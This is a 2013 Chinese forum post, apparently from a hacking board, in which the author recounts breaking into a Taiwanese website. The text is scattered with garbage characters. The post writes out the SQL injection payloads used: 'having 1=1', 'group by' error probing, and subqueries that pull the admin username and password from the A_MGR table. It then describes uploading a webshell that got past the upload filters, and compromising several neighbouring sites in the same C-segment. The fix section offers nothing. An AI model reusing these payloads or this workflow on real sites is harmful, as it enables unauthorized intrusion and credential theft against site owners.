发现一个注入点
, {0 a/ f* Z, A& ?, z' }http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
1 w/ j7 a, j% h- z, J5 A4 T A7 Q
习惯性的加’having1=1--
3 s$ N/ [9 k: U0 ]" V9 [% J! i4 @( X B% |' S
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—" C$ p7 [8 Y8 `! i, u1 a
; p) B2 _% B/ ^7 _" V( ~+ A! C
0
5 T! a6 D+ o8 o0 p4 r$ L8 \2 q) S: \/ A a$ j6 }
爆出Diary_A.dl_Title(这时候很激动啊)2 m3 A* Q6 c3 `( f* ]9 ?
) g% W* I* y+ w7 y* F. l那么继续
* ]* j7 I/ E1 F) d) W( zhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
/ P/ p t+ [6 d+ W. m2 ?
0 H& u7 o3 V5 {( I继续,一直爆下去( j7 n, S1 L+ ~2 {7 n
' N7 x$ x; ?' m; m爆到几个字段和表段 但是没找到需要的管理用户的字段: I8 j T8 z8 S: j/ V/ }! ?
/ W9 i) d+ M) X蛋疼了 怎么办 然后去后台登陆页看源码
+ O0 l0 p" q7 {2 q/ Q5 a* a/ U5 n$ t8 W* @; H1 D5 q. k; j }8 z9 s
0' b& t& V# I, N0 l9 m1 z
+ w' l/ f1 N2 zInput name= “ADUID”. E2 _* u) X( B: A8 U) M/ C
Input name= “ADPWD”
. b% Y2 |" \1 L: q, j
8 ]) J/ m. q2 g, L- b z# O6 @8 k很幸运 找到了字段那就继续
* G; R6 ?- D1 H1 H" V, B找到之后开始爆用户3 {; y. m* N7 J
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
7 x% x) r' n4 {9 d1 D& t$ i爆密码& s2 z: T3 ^+ V* {1 d. L* d
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—& f" U9 @% U( o7 x6 f/ f$ t
测试了下 这个注入点只能爆到文章哪里的表 ; N4 b. @" r5 K" g7 S
& t4 I' T% ^* J) K4 E2 }$ s头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
. `% F7 h8 q# g( `1 A
% e0 a ^! D% v7 H$ H又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了- {" ?0 Z. j# Z& l' w
* _* P: }- c1 I+ z2 }3 }
473
: M; s+ T' N+ [* g# f# \8 A7 D3 ?7 b8 C
进后台& W. q4 [$ ?8 r( _3 N
- y6 `0 v9 l: o, d
+ f0 d5 j1 t0 ` e _& E发现几个上传点 有的地方不能上传 而且防止恶意代码& B. c' b: N3 n% T
}$ ?! b0 S7 @& M. U
没办法 各种百度各种找大牛 找到一只好像可以突破的马) a8 s0 |$ P2 t
9 Z7 f/ I1 k3 p% ?; j2 w% W v: E$ m& f5 k6 n5 N4 F: }1 O
在系统管理那里直接上传 不过没有显示地址0 ]) J- {2 g3 s j
4 ^- j5 f# m6 E9 }) [再上传一次 抓包 搞定OK0 x' `6 K6 ^ m' }/ U
2 s5 e! z4 W3 K y6 f
# p7 x+ {/ B6 ^+ V9 b: U1 }( B# r/ P# u. h4 m5 _' ?2 O
472- I' I3 l/ T" {6 v$ E$ v, n2 z g: i. m
8 @' i- T1 P$ N3 B晚上不行了 去睡觉。。。7 [6 a) E4 u [+ U" e, w
第二天刚起床 闲的没事做继续日站吧 ! l! E- U8 a- C/ o9 w% M8 \
0 @8 Y1 S: t( i9 Z' d! A找个站 就把这个站的旁c扫了下
+ E* Z( g6 f; m7 ?3 w" M, d6 z! S1 X+ _/ j7 a! w
发现c段也有一个购物站 ,然后还和这个站的模板差不多3 N7 s u! t8 n. [
" | e& b+ l& ~% e就找到会员登录口测试1 g. h. Z+ ^( f* X$ ^% B5 M! n2 i
: q. h' g0 U" N
'and (select top 1 MGR_UID from A_MGR)>0—
4 k) {- K H6 a2 V4 Z+ K6 ?果断爆到了 这时候我很激动 通杀
# c5 z4 T( E# x* h3 e0 [ e4 G, F- f7 X6 R X# e* Q% a' C) J
再次翻c段
0 n9 r$ y) s# F. j$ i \7 F$ Q! U
& Z A; i( i2 ^' O翻出几个站 都成功拿下
9 X4 I3 u1 [+ E
, q* X: `1 v' d
+ e5 U- c5 I3 M& n4 S4 N6 l' e- I( D0 r9 p8 g9 O0 w Z
修复方案:( `5 h4 Y, H6 i& V
他们比我专业
I' G% q& F4 _( O3 j6 m* v! Q( \. t
g# Y4 i; c1 x+ U- z, Y
4 l/ k* j. w( { |
发表于 2013-4-4 17:40:38
收藏
支持
反对